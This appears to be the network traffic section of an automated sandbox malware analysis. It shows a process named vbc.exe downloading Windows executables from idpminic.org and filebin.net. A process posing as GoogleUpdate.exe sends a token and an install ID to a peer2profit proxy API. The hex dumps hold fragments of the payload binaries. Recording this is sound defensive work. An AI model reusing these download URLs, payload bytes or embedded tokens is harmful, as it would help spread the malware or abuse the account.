Nov 24, 2022 12:19:59.576819897 CET	1075	IN	Data Raw: 00 45 8b 75 0c e8 36 cf 00 00 48 8d 0d 7f e6 2a 00 48 89 c3 49 01 f6 e8 24 cf 00 00 80 3b 00 49 89 c4 75 35 48 8b 05 85 ff 2a 00 41 bb 0f 01 00 00 45 31 c0 4c 89 e2 41 c7 44 24 08 53 db a3 53 48 8d 0d d9 fa 01 00 49 89 04 24 66 45 89 5c 24 0c c6 Data Ascii: Eu6HHI$;Iu5HAE1LAD$SSHI$fE\$A\|$t-A~$At$~CAD$At$}ffA$LLH\|$(AEHHHD$HAE$HIHD$@sH<HD$hbHHSH\*
Nov 24, 2022 12:19:59.576839924 CET	1076	IN	Data Raw: 00 41 80 7c 24 14 00 74 35 49 b8 d7 65 79 07 ed 21 11 a3 31 c0 0f 1f 44 00 00 48 89 c1 4c 89 c2 83 e1 07 48 c1 e1 03 48 d3 ea 41 30 14 04 48 83 c0 01 48 83 f8 14 75 e2 41 c6 44 24 14 00 4c 89 e2 4c 89 e9 e8 29 de 01 00 85 c0 75 07 4c 89 3d 0e d8 Data Ascii: A\|$t5Iey!1DHLHHA0HHuAD$LL)uL=+HT$P:u1HAFKF E1HIfAFLA~t(A~Av?#w~wAvAFffALLuL=+HT$ Hl$0HBH9T$@HD$
Nov 24, 2022 12:19:59.576858997 CET	1077	IN	Data Raw: 84 3f 02 00 00 e8 2a d9 01 00 48 8d 1c 00 48 89 de 48 d1 fe 48 89 b4 24 90 00 00 00 48 83 fb 0e 0f 87 3e 02 00 00 48 8b 8c 24 b0 00 00 00 48 89 f0 48 83 fe 01 0f 84 19 02 00 00 48 85 f6 0f 85 e0 01 00 00 45 31 c0 48 89 84 24 b8 00 00 00 66 44 89 Data Ascii: ?HHHH$H>H$HHHE1H$fDAHE11HHD$ L*{H$HPH$HH9H$HHH$HHH$HH$1H@fPH9tH$HTH$

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.3	49709	66.235.200.147	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 12:20:02.179210901 CET	4069	OUT	GET /aula/ofg7d45fsdfgg312.sfhg HTTP/1.1 Host: www.idpminic.org
Nov 24, 2022 12:20:02.279588938 CET	4071	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:02 GMT Transfer-Encoding: chunked Connection: keep-alive Last-Modified: Wed, 23 Nov 2022 20:08:53 GMT Vary: Accept-Encoding,User-Agent host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== CF-Cache-Status: HIT Age: 1488 Server: cloudflare CF-RAY: 76f1c0c5a806bbe5-FRA Data Raw: 37 65 37 38 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 66 ac 49 39 07 c2 1a 39 07 c2 1a 39 07 c2 1a ea 75 c1 1b 33 07 c2 1a ea 75 c7 1b b4 07 c2 1a ea 75 c6 1b 2d 07 c2 1a 6b 72 c7 1b 10 07 c2 1a 6b 72 c6 1b 28 07 c2 1a 6b 72 c1 1b 2a 07 c2 1a ea 75 c3 1b 30 07 c2 1a 39 07 c3 1a 58 07 c2 1a f8 72 cb 1b 38 07 c2 1a f8 72 3d 1a 38 07 c2 1a f8 72 c0 1b 38 07 c2 1a 52 69 63 68 39 07 c2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6f 7a 7e 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 d2 00 00 00 8e 00 00 00 00 00 00 13 24 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 4c 01 00 64 00 00 00 00 80 01 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 4c 0f 00 00 a0 3f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 40 01 00 18 00 00 00 d8 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 d0 00 00 00 10 00 00 00 d2 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b0 64 00 00 00 f0 00 00 00 66 00 00 00 d6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 0c 14 00 00 00 60 01 00 00 0a 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 80 01 00 00 02 00 00 00 46 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 4c 0f 00 00 00 90 01 00 00 10 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 7e78MZ@!L!This program cannot be run in DOS mode.$}fI999u3uu-krkr(kr*u09Xr8r=8r8Rich9PELoz~c$@@LdL?8@?@T.text `.rdatadf@@.data`<@.rsrcF@@.relocLH@B
Nov 24, 2022 12:20:02.279630899 CET	4072	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 14 8b c1 53 8b d0 89 45 ec 56 57 8d 72 01 8a 02 42 84 c0 Data Ascii: USEVWrBu+BEd0@@fpuN<L1xM;tNytGI S[OBt#fDR3iJuE2tpuuUuF$jxF
Nov 24, 2022 12:20:02.279655933 CET	4073	IN	Data Raw: fe ff ff ba bc 3c 41 00 b9 ec 3c 41 00 e8 52 fe ff ff c7 45 f4 00 00 00 00 ff 15 48 f0 40 00 8d 4d f4 51 50 ff 15 2c f0 40 00 83 7d f4 00 0f 84 9c 00 00 00 64 a1 30 00 00 00 8b 40 0c 8b 40 0c 0f 1f 40 00 8b 70 18 89 75 f8 8b 4e 3c 8b 4c 31 78 03 Data Ascii: <A<AREH@MQP,@}d0@@@puN<L1xM;tQytJI QMO^oBt R3iJuk-ytMpuuUF$xFMQ=A<AT=AXEP
Nov 24, 2022 12:20:02.279683113 CET	4075	IN	Data Raw: 66 0f 13 84 24 9c 00 00 00 66 0f 13 84 24 a4 00 00 00 66 0f 13 84 24 ac 00 00 00 66 0f 13 84 24 b4 00 00 00 66 0f 13 84 24 bc 00 00 00 66 0f 13 84 24 c4 00 00 00 66 0f 13 84 24 cc 00 00 00 0f 29 84 24 d8 00 00 00 ff 15 34 f0 40 00 90 6a 00 ff 15 Data Ascii: f$f$f$f$f$f$f$)$4@jL@~d0@@pt$N<L1xL$ ;tPytII QL$OFjWBtR3iJuDH^.tL$put$ T$jF$xF
Nov 24, 2022 12:20:02.279709101 CET	4076	IN	Data Raw: e9 04 4f 89 4c 24 18 be 9a 4b 0f d0 8b 09 03 ca 8a 11 41 84 d2 74 1e 90 0f be d2 8d 49 01 33 d6 69 f2 93 01 00 01 8a 51 ff 84 d2 75 eb 81 fe d0 05 4d bc 74 0f 8b 4c 24 18 8b 50 18 85 ff 75 bf 8b 00 eb 94 8b 74 24 20 8b 54 24 14 8b 46 24 8d 04 78 Data Ascii: OL$KAtI3iQuMtL$Put$ T$F$xFj<@c_3^]U(>Ad,HV(?A0XE(`?AEWEfEh(p?Ax
Nov 24, 2022 12:20:02.279735088 CET	4077	IN	Data Raw: e8 20 37 00 00 c7 45 fc fe ff ff ff 8b 45 e0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 6a 07 e8 91 03 00 00 56 e8 53 37 00 00 ff 75 e0 e8 0f 37 00 00 cc e8 b4 02 00 00 e9 7a fe ff ff 3b 0d 04 60 41 00 75 01 c3 e9 32 06 00 00 c2 00 00 55 8b Data Ascii: 7EEMdY_^[jVS7u7z;`Au2UEVH<AQAk(;tM;JrBB;r(;u3^]Vt dhAP;t3u2^^U}uhAu2]`<uj
Nov 24, 2022 12:20:02.279761076 CET	4079	IN	Data Raw: ff ff 6a 00 ff 15 84 f0 40 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0 01 c3 32 c0 c3 68 35 29 40 00 ff 15 78 f0 40 00 c3 55 Data Ascii: j@t4MZf9u*H<9PEuf9Auytvt2h5)@x@UVW}7>csmu%~uF= t=!t="t=@t_3^].0w-0B8% iASVEAEA;sW>tT@;r_^[SVEAEA;sW>t
Nov 24, 2022 12:20:02.279788017 CET	4080	IN	Data Raw: ff 75 10 e8 de 16 00 00 8b c8 8b 45 e8 64 a3 00 00 00 00 8b c1 c9 c3 55 8b ec 83 ec 40 53 81 7d 08 23 01 00 00 75 12 b8 cb 2e 40 00 8b 4d 0c 89 01 33 c0 40 e9 d1 00 00 00 83 65 c0 00 c7 45 c4 17 30 40 00 a1 04 60 41 00 8d 4d c0 33 c1 89 45 c8 8b Data Ascii: uEdU@S}#u.@M3@eE0@`AM3EEEEEEEE EeeeemdEEdE0YMEEEEE@ET@EMUEEEPE0UYYe}td]
Nov 24, 2022 12:20:02.279815912 CET	4081	IN	Data Raw: 83 c1 02 84 d2 75 e4 eb d8 1b c0 83 c8 01 5d c3 6a 08 68 b8 47 41 00 e8 e4 f6 ff ff 8b 45 08 85 c0 74 7e 81 38 63 73 6d e0 75 76 83 78 10 03 75 70 81 78 14 20 05 93 19 74 12 81 78 14 21 05 93 19 74 09 81 78 14 22 05 93 19 75 55 8b 48 1c 85 c9 74 Data Ascii: u]jhGAEt~8csmuvxupx tx!tx"uUHtNQt)eRpJE1uuCYYet@tQpT@MdY_^[UMU]U}t2VW}7>csmu!~u~ t~!t~"
Nov 24, 2022 12:20:02.279841900 CET	4083	IN	Data Raw: 8b 48 18 39 5f 18 75 23 85 c9 74 5a 85 f6 74 56 ff 77 14 8d 47 08 50 51 e8 19 fc ff ff 59 59 50 56 e8 64 12 00 00 83 c4 0c eb 15 85 c9 74 37 85 f6 74 33 f6 07 04 6a 00 5b 0f 95 c3 43 89 5d e0 c7 45 fc fe ff ff ff 8b c3 eb 0b 33 c0 40 c3 8b 65 e8 Data Ascii: H9_u#tZtVwGPQYYPVdt7t3j[C]E3@e3MdY_^[)jhHAUM:}yzeuVRQ]St!u4FPs}YYjPvWFPsaYYPvWEMdY
Nov 24, 2022 12:20:02.279866934 CET	4084	IN	Data Raw: 0c 53 56 e8 23 f2 ff ff 57 ff 75 14 ff 75 0c e8 e4 05 00 00 57 e8 9b 07 00 00 83 c4 10 50 e8 4c 05 00 00 e8 e4 24 00 00 cc 55 8b ec 83 ec 38 53 8b 5d 08 81 3b 03 00 00 80 0f 84 17 01 00 00 56 57 e8 f4 f8 ff ff 33 ff 39 78 08 74 46 57 ff 15 94 f0 Data Ascii: SV#WuuWPL$U8S];VW39xtFW@9pt3;MOCt+;RCCt#u$u uuuuS}EE}9xu PuEuPEP\|UEEU;UkM}jpEY9EN;E

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.3	49710	66.235.200.147	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2022 12:20:02.976017952 CET	4162	OUT	GET /aula/f429fjd4uf84u.sdfh HTTP/1.1 Host: www.idpminic.org Connection: Keep-Alive
Nov 24, 2022 12:20:03.197792053 CET	4163	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:03 GMT Transfer-Encoding: chunked Connection: keep-alive Last-Modified: Wed, 23 Nov 2022 13:29:12 GMT Vary: Accept-Encoding,User-Agent host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== CF-Cache-Status: HIT Age: 3193 Server: cloudflare CF-RAY: 76f1c0ca9ed76963-FRA Data Raw: 37 65 37 39 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 3c 03 f8 b0 78 62 96 e3 78 62 96 e3 78 62 96 e3 ab 10 95 e2 72 62 96 e3 ab 10 93 e2 f6 62 96 e3 ab 10 92 e2 6c 62 96 e3 2a 17 93 e2 54 62 96 e3 2a 17 92 e2 69 62 96 e3 2a 17 95 e2 6c 62 96 e3 ab 10 97 e2 7d 62 96 e3 78 62 97 e3 2c 62 96 e3 b9 17 9f e2 7b 62 96 e3 b9 17 69 e3 79 62 96 e3 b9 17 94 e2 79 62 96 e3 52 69 63 68 78 62 96 e3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 14 71 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 32 01 00 00 e2 60 00 00 00 00 00 c4 6f 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 62 00 00 04 00 00 ff b4 62 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 ec 5c 00 3c 00 00 00 00 20 5d 00 14 0b 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 62 00 7c 13 00 00 d8 ce 5c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf 5c 00 18 00 00 00 f8 ce 5c 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 01 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 33 30 01 00 00 10 00 00 00 32 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 a2 5b 00 00 50 01 00 00 a4 5b 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 1d 00 00 00 00 5d 00 00 0a 00 00 00 da 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 0b 05 00 00 20 5d 00 00 0c 05 00 00 e4 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 7c 13 00 00 00 30 62 00 00 14 00 00 00 f0 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 7e79MZ@!L!This program cannot be run in DOS mode.$<xbxbxbrbblbTbib*lb}bxb,b{biybybRichxbPELqc2`oP@Pbb@D\< ]0b\|\\\@P.text302 `.rdata[P[6@@.data]\@.rsrc ]\@@.reloc\|0ba@B
Nov 24, 2022 12:20:03.197837114 CET	4165	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 51 6a 04 e8 48 5c 00 00 83 c4 04 89 45 fc a3 f0 1c 9d 00 c7 00 Data Ascii: UQjH\E;@]UQj\E @]UQj[EA@]UQj[E0F@]
Nov 24, 2022 12:20:03.197890043 CET	4166	IN	Data Raw: 75 30 83 c8 01 89 86 50 01 00 00 8d 45 e0 c7 45 fc 01 00 00 00 8d b6 0c 01 00 00 50 8b ce e8 c1 40 00 00 68 80 39 41 00 e8 1e 58 00 00 83 c4 04 eb 06 8d b6 0c 01 00 00 8b ce e8 e5 4f 00 00 56 57 ff 15 14 50 41 00 a3 d4 1c 9d 00 8b 4d f4 64 89 0d Data Ascii: u0PEEP@h9AXOVWPAMdY_^M3U]Ujh+AdP,3ESVWPEdd,Ef;KE RWE#%I8EE}uVWEfE
Nov 24, 2022 12:20:03.197916031 CET	4167	IN	Data Raw: ec 34 a1 04 00 9d 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 a1 e4 1c 9d 00 85 c0 0f 85 b4 01 00 00 64 a1 2c 00 00 00 c7 45 e0 2e ec b5 bd c7 45 e4 16 25 5a 6d c7 45 e8 6b ed ab bf 8b 38 c6 45 ec 73 89 7d c4 8b 87 98 08 00 00 a8 01 Data Ascii: 43ESVWPEdd,E.E%ZmEk8Es}uVWEfEUMQDD9Durh`;AREQDtCWfE}uEsIi_y0u
Nov 24, 2022 12:20:03.197942019 CET	4169	IN	Data Raw: c7 45 fc ff ff ff ff eb 06 8d b6 d4 06 00 00 8b ce e8 42 42 00 00 56 57 ff 15 14 50 41 00 a3 54 1c 9d 00 ff d0 8d 4d d8 51 50 ff d3 8b 45 d8 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d f0 33 cd e8 29 4b 00 00 8b e5 5d c3 cc cc cc cc cc cc cc Data Ascii: EBBVWPATMQPEMdY_^[M3)K]Ujh@.AdP3EPEdElMQEhEGMQE%MQM+MUUNYXUME6
Nov 24, 2022 12:20:03.197968006 CET	4170	IN	Data Raw: 45 d8 a8 01 75 33 83 c8 01 89 86 a8 05 00 00 8d 45 d8 c7 45 fc 05 00 00 00 8d 8e 98 0a 00 00 50 e8 3d 32 00 00 68 80 3e 41 00 e8 0a 49 00 00 83 c4 04 c7 45 fc ff ff ff ff 80 be ad 0a 00 00 00 8d 9e 98 0a 00 00 74 3c 0f 57 c0 66 0f 13 45 e8 8b 75 Data Ascii: Eu3EEP=2h>AIEt<WfEu}A!0;uruCSuUEE(E1tE:fE6FEu3EEdPR4h`>AOHE
Nov 24, 2022 12:20:03.197993040 CET	4171	IN	Data Raw: 00 00 8d 8e b4 01 00 00 50 e8 ae 30 00 00 68 a0 3d 41 00 e8 1b 44 00 00 83 c4 04 c7 45 fc ff ff ff ff 80 be c8 01 00 00 00 8d 9e b4 01 00 00 74 3c 0f 57 c0 66 0f 13 45 e8 8b 75 ec 8b 7d e8 8b cf b8 37 3f c9 03 83 e1 07 ba eb dd 3d bd c1 e1 03 e8 Data Ascii: P0h=ADEt<WfEu}7?=0;uruCSuU(EE~Eu3EEP0h=AmCEt<WfEu})
Nov 24, 2022 12:20:03.198018074 CET	4173	IN	Data Raw: 00 8d 9e a0 07 00 00 74 3c 0f 57 c0 66 0f 13 45 e8 8b 75 ec 8b 7d e8 8b cf b8 03 3d 6b a5 83 e1 07 ba cf 5d 93 57 c1 e1 03 e8 18 fb 00 00 30 04 3b 83 c7 01 83 d6 00 75 05 83 ff 18 72 d9 8b 75 d0 c6 43 18 00 53 ff 75 cc ff 55 d4 0f 28 05 90 ca 9c Data Ascii: t<WfEu}=k]W0;uruCSuU(E\EEu3\EEP(h<A>Et@WfEu}@qi0uruC
Nov 24, 2022 12:20:03.198045969 CET	4174	IN	Data Raw: e1 03 e8 39 f6 00 00 30 04 1f 83 c7 01 83 d6 00 75 05 83 ff 08 72 d9 8b 75 d0 c6 43 08 00 53 ff 75 cc ff 55 d4 0f 28 05 f0 ca 9c 00 a3 c4 1c 9d 00 a1 a4 1c 9d 00 89 45 d4 8b 86 2c 08 00 00 0f 11 45 e0 a8 01 75 33 83 c8 01 89 86 2c 08 00 00 8d 45 Data Ascii: 90uruCSuU(E,Eu3,EEP:!h;A9EtBWfE]uf0>urGWuUMdY_^[M3i6]
Nov 24, 2022 12:20:03.198074102 CET	4175	IN	Data Raw: 00 0f 57 c0 c7 85 78 ff ff ff 00 00 00 00 03 c6 66 0f 13 45 84 51 8d 8d 88 fc ff ff 89 85 a4 fc ff ff 51 a1 8c 1c 9d 00 8d 4d 80 51 6a 00 6a 00 68 04 00 00 08 6a 00 6a 00 6a 00 ff b5 9c fc ff ff 66 0f 13 45 8c 6a 00 6a 00 66 0f 13 45 94 66 0f 13 Data Ascii: WxfEQQMQjjhjjjfEjjfEfEfEfEfEfEf~EQu\|jjPLPVx\|tVtejV
Nov 24, 2022 12:20:03.198098898 CET	4177	IN	Data Raw: 83 c4 30 8b f0 8b ce c7 45 fc 01 00 00 00 e8 c1 23 00 00 56 8d 85 98 ed ff ff 50 ff d7 8d 85 f0 f7 ff ff c7 45 fc ff ff ff ff 50 8d 85 98 ed ff ff 50 ff 15 c4 1c 9d 00 a1 c4 1c 9d 00 89 85 08 e3 ff ff e8 0c 02 00 00 81 ec b8 00 00 00 8b f0 b9 2d Data Ascii: 0E#VPEPP-+E"VPEuSP(0=(@05i4'8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49711	185.47.40.36	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Direction	Data
2022-11-24 11:20:13 UTC	OUT	GET /frdkqyshm4sv9kq0/launcher.exe HTTP/1.1 Host: filebin.net Connection: Keep-Alive
2022-11-24 11:20:13 UTC	IN	HTTP/1.1 403 Forbidden Cache-Control: max-age=0 Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding X-Robots-Tag: noindex Date: Thu, 24 Nov 2022 11:20:13 GMT Content-Length: 43 X-Varnish: 22119728 Age: 0 Via: 1.1 varnish (Varnish/6.0) Access-Control-Allow-Origin: * Connection: close
2022-11-24 11:20:13 UTC	IN	Data Raw: 54 68 65 20 66 69 6c 65 20 68 61 73 20 62 65 65 6e 20 72 65 71 75 65 73 74 65 64 20 74 6f 6f 20 6d 61 6e 79 20 74 69 6d 65 73 2e Data Ascii: The file has been requested too many times.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49712	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	Direction	Data
2022-11-24 11:20:44 UTC	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:44 UTC	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:45 UTC	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:45 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1d08ba49b82-FRA
2022-11-24 11:20:45 UTC	IN	Data Raw: 7b 0a 20 20 20 20 22 73 74 61 74 75 73 22 3a 20 22 53 55 43 43 45 53 53 22 2c 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 6e 6f 64 65 22 3a 20 22 35 31 2e 31 39 35 2e 37 37 2e 32 30 38 22 2c 0a 20 20 20 20 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 33 2c 0a 20 20 20 20 20 20 20 20 22 70 65 65 72 5f 69 64 22 3a 20 32 33 39 34 31 37 30 31 38 0a 20 20 20 20 7d 0a 7d Data Ascii: { "status": "SUCCESS", "data": { "node": "51.195.77.208", "port": 443, "peer_id": 239417018 }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49738	172.66.43.60	443	C:\Windows\GoogleUpdate.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-24 11:20:50 UTC	6	OUT	POST /api/proxy/nodes/get HTTP/1.1 Content-Type: application/json User-Agent: Microsoft Internet Explorer Host: api.peer2profit.com Content-Length: 186 Cache-Control: no-cache
2022-11-24 11:20:50 UTC	6	OUT	Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 20 22 53 44 4b 5f 48 4e 78 4c 69 6f 73 52 4f 62 7a 37 58 54 4f 61 5a 38 62 48 45 34 65 4d 57 41 7a 67 41 76 39 32 36 6a 61 53 48 38 72 37 35 4e 42 76 48 61 55 4c 4b 79 53 39 64 77 75 56 22 2c 20 22 69 6e 73 74 61 6c 6c 69 64 22 3a 20 22 50 32 50 5f 57 49 4e 5f 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 5f 6e 65 6f 64 6f 2e 76 69 6d 40 6d 61 69 6c 2e 72 75 22 2c 20 22 76 65 72 22 3a 20 22 30 2e 38 22 2c 20 22 61 67 65 6e 74 22 3a 20 22 31 2e 30 37 2e 30 32 22 7d Data Ascii: {"token": "SDK_HNxLiosRObz7XTOaZ8bHE4eMWAzgAv926jaSH8r75NBvHaULKyS9dwuV", "installid": "P2P_WIN_d06ed635-68f6-4e9a-955c-4899f5f57b9a_neodo.vim@mail.ru", "ver": "0.8", "agent": "1.07.02"}
2022-11-24 11:20:50 UTC	6	IN	HTTP/1.1 200 OK Date: Thu, 24 Nov 2022 11:20:50 GMT Content-Type: application/json Content-Length: 131 Connection: close CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 76f1c1f48f479962-FRA
